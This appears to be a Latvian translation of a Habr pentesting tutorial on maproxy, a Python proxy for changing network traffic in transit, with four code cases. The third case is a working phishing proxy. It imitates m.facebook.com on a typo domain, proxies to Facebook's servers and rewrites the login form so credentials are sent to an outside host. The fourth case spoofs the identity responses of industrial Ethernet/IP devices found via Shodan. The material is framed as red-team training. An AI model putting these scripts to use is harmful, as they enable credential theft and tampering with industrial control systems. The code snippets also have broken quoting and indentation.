🥇Tīkla datu apstrāde lidojuma laikā

Raksta tulkojums tika sagatavots kursu sākuma priekšvakarā “Pentests. Iespiešanās pārbaudes prakse".

Anotācija

Dažādu veidu drošības novērtējumi, sākot no regulāras iespiešanās pārbaudes un Red Team operācijām līdz IoT/ICS ierīču un SCADA uzlaušanai, ietver darbu ar binārajiem tīkla protokoliem, tas ir, būtībā tīkla datu pārtveršanu un modificēšanu starp klientu un mērķi. Tīkla trafika uztveršana nav grūts uzdevums, jo mums ir tādi rīki kā Wireshark, Tcpdump vai Scapy, taču šķiet, ka pārveidošana ir darbietilpīgāks uzdevums, jo mums būs nepieciešams sava veida interfeiss, lai lasītu tīkla datus, filtrētu tos vai mainītu. to lidojumā un gandrīz reāllaikā nosūtiet atpakaļ mērķa saimniekdatoram. Turklāt būtu ideāli, ja šāds rīks varētu automātiski strādāt ar vairākiem paralēliem savienojumiem un būtu pielāgojams, izmantojot skriptus.

Kādu dienu es atklāju rīku, ko sauc maproxy, dokumentācijā man ātri kļuva skaidrs, ka maproxy - tieši tas, kas man vajadzīgs. Šis ir diezgan vienkāršs, daudzpusīgs un viegli konfigurējams TCP starpniekserveris. Es pārbaudīju šo rīku vairākās diezgan sarežģītās lietojumprogrammās, tostarp ICS ierīcēs (kas ģenerē daudz pakešu), lai noskaidrotu, vai tas spēj apstrādāt daudzus paralēlus savienojumus, un rīks darbojās labi.

Šis raksts iepazīstinās jūs ar tīkla datu apstrādi lidojumā, izmantojot maproxy.

Pārskatiet

Instruments maproxy ir balstīta uz Tornado, populāru un nobriedušu asinhrono tīklu sistēmu Python.

Kopumā tas var darboties vairākos režīmos:

TCP:TCP – nešifrēti TCP savienojumi;
TCP:SSL и SSL:TCP – ar vienvirziena šifrēšanu;
SSL:SSL - divvirzienu šifrēšana.

Tā nāk kā bibliotēka. Lai ātri sāktu, varat izmantot piemēru failus, kas atspoguļo galveno bibliotēkas funkcijas:

all.py
certificate.pem
logging_proxy.py
privatekey.pem
ssl2ssl.py
ssl2tcp.py
tcp2ssl.py
tcp2tcp.py

1. gadījums – vienkāršs divvirzienu starpniekserveris

Balstoties uz tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

Pēc noklusējuma ProxyServer() ņem divus argumentus – savienojuma vietu un mērķa portu. server.listen() ņem vienu argumentu - portu ienākošā savienojuma noklausīšanai.

Skripta izpilde:

# python tcp2tcp.py

Lai palaistu testu, mēs izveidosim savienojumu ar vietējo SSH serveri, izmantojot mūsu starpniekservera skriptu, kas klausās 2222/tcp portu un savienojas ar standarta portu 22/tcp SSH serveri:

Sveiciena reklāmkarogs informē, ka mūsu skripta paraugs ir veiksmīgi izmantojis tīkla trafiku ar starpniekserveri.

2. gadījums – datu pārveidošana

Vēl viens demonstrācijas skripts logging_proxy.py ideāli piemērots mijiedarbībai ar tīkla datiem. Komentāri failā apraksta klases metodes, kuras varat mainīt, lai sasniegtu savu mērķi:

Interesantākais ir šeit:

on_c2p_done_read – pārtvert datus ceļā no klienta uz serveri;
on_p2s_done_read - otrādi.

Mēģināsim nomainīt SSH reklāmkarogu, ko serveris atgriež klientam:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

Izpildiet skriptu:

Kā redzat, klients tika maldināts, jo viņam tika mainīts SSH servera nosaukums «DumnySSH».

3. gadījums – vienkārša pikšķerēšanas tīmekļa lapa

Ir bezgalīgi daudz veidu, kā izmantot šo rīku. Šoreiz pievērsīsimies kaut kam praktiskākam no Sarkanās komandas operāciju puses. Atdarināsim galveno lapu m.facebook.com un izmantojiet pielāgotu domēnu ar apzinātu drukas kļūdu, piemēram, m.facebok.com. Demonstrācijas nolūkos pieņemsim, ka domēnu esam reģistrējuši mēs.

Mēs izveidosim nešifrētu tīkla savienojumu ar mūsu upuru starpniekserveri un SSL straumi uz Facebook serveri (31.13.81.36). Lai šis piemērs darbotos, mums ir jāaizstāj HTTP resursdatora galvene un jāievada pareizais saimniekdatora nosaukums, kā arī tiks atspējota atbildes saspiešana, lai mēs varētu viegli piekļūt saturam. Galu galā mēs aizstāsim HTML veidlapu, lai pieteikšanās akreditācijas dati tiktu nosūtīti mums, nevis Facebook serveriem:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/lv/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

Rezumējot:

Kā redzat, mēs varējām veiksmīgi aizstāt sākotnējo vietni.

4. gadījums — Ethernet/IP pārnešana

Es jau labu laiku nodarbojos ar industriālām ierīcēm un programmatūru (ICS/SCADA), piemēram, programmējamiem kontrolleriem (PLC), I/O moduļiem, diskdziņiem, relejiem, kāpņu programmēšanas vidēm un daudz ko citu. Šis futrālis ir paredzēts tiem, kam patīk industriālās lietas. Šādu risinājumu uzlaušana ietver aktīvu spēlēšanos ar tīkla protokoliem. Nākamajā piemērā es vēlētos parādīt, kā jūs varat modificēt ICS/SCADA tīkla trafiku.

Lai to izdarītu, jums ir nepieciešams:

Tīkla sniffer, piemēram, Wireshark;
Ethernet/IP vai vienkārši SIP ierīce, to var atrast, izmantojot Shodan pakalpojumu;
Mūsu skripts ir balstīts uz maproxy.

Vispirms apskatīsim, kā izskatās tipiska identifikācijas atbilde no CIP (Common Industrial Protocol).

Ierīces identifikācija tiek veikta, izmantojot Ethernet/IP protokolu, kas ir rūpnieciskā Ethernet protokola uzlabota versija, kas aptver vadības protokolus, piemēram, CIP. Mēs mainīsim izcelto ID nosaukumu, kas ir redzams ekrānuzņēmumā "NI-IndComm Ethernet" izmantojot mūsu starpniekservera skriptu. Mēs varētu atkārtoti izmantot skriptu logging_proxy.py un līdzīgi modificēt klases metodi on_p2s_done_read, jo mēs vēlamies, lai klientam būtu redzams cits identitātes nosaukums.

Kods:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

Būtībā mēs divreiz prasījām ierīces identifikāciju, otrā atbilde bija sākotnējā, un pirmā tika mainīta lidojuma laikā.

Un pēdējais

Pēc manām domām maproxy Ērts un vienkāršs rīks, kas rakstīts arī Python valodā, tāpēc uzskatu, ka arī jūs varat gūt labumu no tā izmantošanas. Protams, ir sarežģītāki rīki tīkla datu apstrādei un modificēšanai, taču arī tie prasa lielāku uzmanību un parasti tiek radīti konkrētam lietošanas gadījumam, piem. Muraena, Modlishka vai evilginx gadījumiem, kas līdzīgi trešajam, vai canape par pēdējo gadījumu. Tā vai citādi, ar palīdzību maproxy varat ātri īstenot savas idejas tīkla datu pārtveršanai, jo skriptu piemēri ir ļoti skaidri.

Autentifikācijas mehānismu pārbaude sistēmā Windows AD

Avots: www.habr.com

Apstrādājiet tīkla datus lidojumā